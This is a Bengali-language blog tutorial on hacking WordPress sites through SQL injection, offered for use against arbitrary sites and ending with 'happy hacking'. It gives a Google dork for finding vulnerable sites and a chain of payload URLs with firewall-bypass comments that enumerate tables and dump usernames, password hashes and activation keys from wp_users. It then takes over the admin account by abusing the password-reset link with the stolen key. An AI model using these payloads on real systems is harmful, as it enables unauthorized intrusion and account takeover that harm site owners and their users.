এসকিউএল ইঞ্জেকশন দিয়ে ওয়ার্ডপ্রেস সাইট হ্যাক . .

2
1244

আসসালামু আলাইকুম !

আপনারা অনেকেই   এসকিউএল ইঞ্জেকশন নিয়ে কাজ করেছেন বা শুনেছেন , আজ আপনাদের আমি এসকিউএল ইঞ্জেকশন দিয়ে  ওয়ার্ডপ্রেস হ্যাক এর ১ টি পদ্ধতি দেখাব ।

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

আজ আমি যেই টিউনটা করব তা হল এসকিউএল ইঞ্জেকশন দিয়ে কিভাবে পাসওয়ার্ড রিসেট করে ওয়ার্ডপ্রেস সাইট হ্যাক করা যায়!

 

bacis-sql-injection-tutorial-2013-part-1-1337mir.com-post-photo এসকিউএল ইঞ্জেকশন দিয়ে ওয়ার্ডপ্রেস সাইট হ্যাক . .

 

এক্ষেত্রে যা লাগবে!

 

১। টিউন টা পরার মত ধৈর্য ।

 

২। এসকিউএল ইঞ্জেকশন সম্পর্কে ধারনা ।

 

প্রথমত  আপনাকে গুগল এ ডরক ব্যবহার করে এসকিউএল এ ভুলনারেবল সাইট খুজতে হবে । যেমন –

 

inurl:”/related_posts_exit_popup_window.php”

 

তারপর যে কোন সাইট নেন এবং এসকিউএল ইঞ্জেকশন শুরু করুন !

 

১ম এ order by দিয়ে কলাম নাম্বার বের করুন !

 

www.site.com/wp-content/gallery.vid=7+order+by+1– no error

 

www.site.com/wp-content/gallery.vid=7+order+by+2– no error

 

www.site.com/wp-content/gallery.vid=7+order+by+3– no error

 

www.site.com/wp-content/gallery.vid=7+order+by+4– no error

 

www.site.com/wp-content/gallery.vid=7+order+by+5– no error

 

www.site.com/wp-content/gallery.vid=7+order+by+6–  error

 

মানে কলাম নাম্বার ৫ !!

 

যারা ফায়ারওয়াল বাইপাস পারেন তারা ভুলনারেবল স্ট্রিং কলাম বের করতে লেখুনঃ

 

www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5–

 

এখন অনেক গুলা নাম্বার আসবে যেমন ২,৩ ইত্যাদি । যেকোনো ১তা নাম্বার সিলেক্ট করুন ! এক্ষেত্রে আমি নাম্বার ২ নিলাম! এখন ভারশন বের করতে লিখুন-

 

www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5–

 

ভারশন ৫ আসলে ভাল ! বেশি হলে ও সমস্যা নাই! এখন টেবিল নাম বের করি !

 

www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3,4,5+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()–

 

ফায়ারওয়াল বাইপাস এর সমস্যা হল যে টেবিল আলাদা ভাবে বের করতে হয় !

পরের টেবিল পেতে  =database() এর পর লিখুন  limit 1,1– তারপর limit 2,1– এভাবে যতক্ষণ না users অথবা admin  টেবিল পাবেন ততক্ষণ খুঁজেন । ধরুন আমি limit 7,1– এ wp_users টেবিল পাইছি!

এখন কলাম বের করব! তাহলে লেখি-

 

www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3,4,5+/*!50000from*/+information_schema./**/+columns+where+table_name=CHAR(119, 112, 95, 117, 115, 101, 114, 115)–

 

লক্ষ করেন CHAR(119, 112, 95, 117, 115, 101, 114, 115) এটা হল wp_users টেবিল এর CHAR !

Mozilla ব্রাউজার এ Hackbar addon ইন্সটল করে নিয়ে SQL>MySQL>MySQL CHAR()  এই অপশন এ গিয়ে wp_users টেবিল এর CHAR বের করুন।

 

কলাম বের করতে ও শেষে limit 1,1– তারপর limit 2,1– এভাবে দিতে হবে যতক্ষণ না user_login ও user_pass এবং user_activation_key কলাম পাওয়া যায় ।

 

এগুলা পাওয়া গেলে username,password,activation key পেতে লিখুনঃ

 

www.site.com/wp-content/gallery.vid=-7+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(user_login,0x3a,user_pass,0x3a,user_activation_key))),3,4,5+/*!50000from*/+wp_users–

 

এরপর username,password পেলে ও দেখবেন user_activation_key আশে নাই!

 

ধরেন সাইটেরঃ

 

username- admin1

 

password- $d$s4d5sNd2R16da.s4dA

 

ওয়ার্ডপ্রেস সাইটের password ক্রাক করা যায়না।

 

____এখন হল password রিসেট করার পালা :D

 

প্রথমে নতুন ট্যাব খুলে সাইটের admin panel এ যাই। উল্লেখ্য, সব ওয়ার্ডপ্রেস সাইটের admin panel হল —

 

www.site.com/wp-login.php

 

অর্থাৎ সাইটের পরে /wp-login.php দিলে ই admin panel পাওয়া যাবে :) । এখন

 

lost password এ ক্লিক করেন ।

 

দেখবেন username অথবা email চাইবে আপনার বের করা username (admin1)

 

দিয়ে দেন। তারপর লিঙ্ক টা লক্ষ করে দেখুন-

 

www.site.com/wp-login.php?checkmail=confirm

 

এই টাইপ কিছু আসছে নাকি । আসলে কাজ হইসে :D । এখন আপনার username,password ও user_activation_key পাওয়া ওই লিঙ্ক টা রিলোড করেন!

 

দেখেন আগে যেখানে user_activation_key ছিল না অখানে key আসছে! এরকম-

 

SdfgFgkjY13yY23

 

এবার admin panel এর লিঙ্ক এ যেয়ে লিখুন –

 

www.site.com/wp-login.php?action=rp&key=SdfgFgkjY13yY23&login=admin1

 

অর্থাৎ আমরা শেষে www.site.com/wp-login.php এর পর ?action=rp&key=SdfgFgkjY13yY23&login=admin1 যোগ করেছি !

এখন এনটার চাপ দিন ! দেখুন password চেঞ্জ করার অপশন আসছে! :D :D :D এবার password চেঞ্জ করে লগিন করুন :) !

হ্যাপি হ্যাকিং :) । কোন প্রকার সমস্যা হলে কমেন্ট করে জানাতে পারেন :)

 

শুভকামনায়- বাংলাদেশ স্ক্রিপ্ট কিডই হ্যাকারস  :)

 

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

2 মন্তব্য

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

15 + one =